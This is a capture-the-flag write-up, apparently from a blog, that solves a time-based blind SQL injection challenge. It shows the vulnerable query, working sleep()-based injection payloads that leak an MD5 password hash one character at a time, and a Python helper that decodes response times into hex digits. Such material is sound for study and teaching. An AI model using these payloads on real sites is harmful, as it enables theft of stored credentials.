Writeup: Blinded by the lighter

Source: Internet
Author: User
Tags: sleep function

Challenge hints:

1. Again your mission is to extract an MD5 password hash out of the database.

You need to get the password out of the database; the password is stored as an MD5 hash.

2. This time your limit for this blind SQL injection is 33 queries.

You can inject at most 33 times.

3. Also, you have to accomplish this task 3 times consecutively to prove you have solved the challenge.

It only counts as solved after doing it three times in a row. Why... why... why...

4. You can view some of the key source code; the injection point is this statement:

$query = "SELECT 1 FROM (SELECT password FROM blight WHERE sessid=$sessid) b WHERE password='$password'";

There is also a time limit:

/**
 * Check if you were too slow.
 * @return true|false
 */
function blighttimeout()
{
    if (false === ($start = GWF_Session::getOrDefault('BLIGHT2_TIME_START', false))) {
        return true;
    } else {
        return (time() - $start) > BLIGHT2_TIME;
    }
}

It really is enforced: when I took a little too long, the challenge said I was too slow and I had to start over ...


Solution:

Other people's writeups mention that you can use the sleep function and then judge the result by the response time:

' or sleep(ord(substr(password,1,1)))

Testing showed that sleeping for the raw ASCII code takes far too long. Because the characters are limited to 0-9 and a-f, I changed the expression above to the one below by subtracting 46. The time was still not enough, so I additionally divided by 2. As for why the subtraction is 46, think about it yourselves, haha; personally I feel 46 is the most suitable:

' or sleep((ord(substr(password,1,1))-46)/2) #

OK, the injection works. So how do you measure the delay? Use the Firebug plug-in for Firefox: press F12 to open Firebug, select the Network tab, and enable the two options HTML and Persist. Persist keeps the history so that you can look at all the records together afterwards, which speeds things up; the Clear option clears the history.

OK, here we go:

1. Reset the challenge (execute a Reset).

2. Clear the Firebug history.

3. Start injecting from the first character and continue through the 32nd.

4. Look at the response time after each injection in Firebug. Note that you have to move the mouse over the timeline to see, in the small pop-up window, the time at which the last data was received. How do you choose the time scale? Use units of 0.5 and round any excess down; for example, 0.76 is counted as 0.5.

5. Prepare an Excel sheet in advance that calculates char(x*2+46), where x is the response time.

6. OK, tidy up the data and submit it. Once it reports success, repeat the steps above two more times and the challenge is done.
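Steps 4 and 5 above, done in Python instead of Excel, as an added example that is not part of the original write-up: each measured time is rounded down to 0.5 s and passed through char(x*2+46), and the leftover latency is reported so that a measurement close to the next 0.5 s step stands out. The sample hash, the response times and all function names are constructed for this example.

```python
import math

HEX_DIGITS = "0123456789abcdef"
STEP = 0.5  # the write-up reads times in units of 0.5 s, rounding down


def expected_delay(ch):
    """Seconds slept for one hash character by the page's (ord(c)-46)/2."""
    return (ord(ch) - 46) / 2


def decode_time(seconds):
    """Apply the write-up's char(x*2+46) after rounding down to 0.5 s.

    Returns (character, overhead); overhead is the part of the measurement
    beyond the sleep itself (network and server latency). If it approaches
    0.5 s, the rounding can no longer be trusted.
    """
    half_steps = math.floor(seconds / STEP)  # this is x*2 in the formula
    ch = chr(half_steps + 46)
    if ch not in HEX_DIGITS:
        raise ValueError(f"{seconds}s decodes to {ch!r}, not a hex digit")
    return ch, round(seconds - half_steps * STEP, 3)


def decode_hash(times):
    """Decode one measured response time per hash position."""
    return "".join(decode_time(t)[0] for t in times)


# Constructed data (assumption): an arbitrary 32-digit hex string and response
# times derived from it by adding 0.08-0.35 s of latency, standing in for the
# values read off the browser's network timeline.
SAMPLE_HASH = "3a0f9c71e2b84d56019af3c7b2e8d645"
LATENCY = [0.08, 0.21, 0.35]
SAMPLE_TIMES = [expected_delay(c) + LATENCY[i % 3]
                for i, c in enumerate(SAMPLE_HASH)]

if __name__ == "__main__":
    # Delay table: every hex digit gets its own multiple of 0.5 s.
    for digit in HEX_DIGITS:
        print(digit, expected_delay(digit))
    print(decode_hash(SAMPLE_TIMES))
```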

This article is from the "H2wechall" blog, make sure to keep this source http://1176518111.blog.51cto.com/9678787/1693484
